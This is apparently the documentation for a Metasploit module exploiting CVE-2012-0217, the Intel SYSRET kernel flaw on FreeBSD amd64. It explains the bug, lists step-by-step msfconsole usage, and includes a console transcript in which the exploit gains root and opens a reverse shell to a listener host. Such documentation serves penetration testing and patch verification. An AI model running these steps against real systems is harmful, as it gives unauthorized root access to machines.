Brendan Coles
3.6 KiB
3.6 KiB
Description
This module exploits a vulnerability in the FreeBSD kernel, when running on 64-bit Intel processors.
By design, 64-bit processors following the X86-64 specification will trigger a general protection fault (GPF) when executing a SYSRET instruction with a non-canonical address in the RCX register.
However, Intel processors check for a non-canonical address prior to dropping privileges, causing a GPF in privileged mode. As a result, the current userland RSP stack pointer is restored and executed, resulting in privileged code execution.
Vulnerable Application
This module has been tested successfully on:
- FreeBSD 8.3-RELEASE (amd64)
- FreeBSD 9.0-RELEASE (amd64)
Verification Steps
- Start
msfconsole - Get a session
use exploit/freebsd/local/intel_sysret_priv_escset SESSION <SESSION>checkrun- You should get a new root session
Options
SESSION
Which session to use, which can be viewed with sessions
WritableDir
A writable directory file system path. (default: /tmp)
Scenarios
FreeBSD 9.0-RELEASE
msf5 > use exploit/freebsd/local/intel_sysret_priv_esc
msf5 exploit(freebsd/local/intel_sysret_priv_esc) > set session 1
session => 1
msf5 exploit(freebsd/local/intel_sysret_priv_esc) > set lhost 123.123.123.188
lhost => 123.123.123.188
msf5 exploit(freebsd/local/intel_sysret_priv_esc) > run
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 123.123.123.188:4444
[+] FreeBSD version 9.0-RELEASE appears vulnerable
[+] System architecture amd64 is supported
[+] hw.model: Intel(R) Core(TM) i9-1337 CPU @ 9.99GHz is vulnerable
[*] Writing '/tmp/.mTaR4rAPd.c' (4781 bytes) ...
[*] Max line length is 131073
[*] Writing 4781 bytes in 1 chunks of 17475 bytes (octal-encoded), using printf
[*] Writing '/tmp/.LBGkIVh' (218 bytes) ...
[*] Max line length is 131073
[*] Writing 218 bytes in 1 chunks of 614 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
[*]
[*] [*] Retrieving host information...
[*] [+] CPU: GenuineIntel
[*] [+] sysname: FreeBSD
[*] [+] release: 9.0-RELEASE
[*] [+] version: FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
[*] [+] machine: amd64
[*] [*] Validating target OS and version...
[*] [+] Vulnerable :-)
[*] [*] Resolving kernel addresses...
[*] [+] Resolved Xofl to 0xffffffff80b02e70
[*] [+] Resolved Xbnd to 0xffffffff80b02ea0
[*] [+] Resolved Xill to 0xffffffff80b02ed0
[*] [+] Resolved Xdna to 0xffffffff80b02f00
[*] [+] Resolved Xpage to 0xffffffff80b03240
[*] [+] Resolved Xfpu to 0xffffffff80b02fc0
[*] [+] Resolved Xalign to 0xffffffff80b03080
[*] [+] Resolved Xmchk to 0xffffffff80b02f60
[*] [+] Resolved Xxmm to 0xffffffff80b02ff0
[*] [*] Setup...
[*] [+] Trigger code...
[*] [+] Trampoline code...
[*] [*] Fire in the hole!
[*] [*] Got root!
[+] Success! Executing payload...
[*] Command shell session 2 opened (123.123.123.188:4444 -> 123.123.123.136:61024) at 2018-12-09 10:40:16 -0500
[+] Deleted /tmp/.mTaR4rAPd.c
[+] Deleted /tmp/.mTaR4rAPd
[+] Deleted /tmp/.LBGkIVh
id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
FreeBSD freebsd-9-0 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64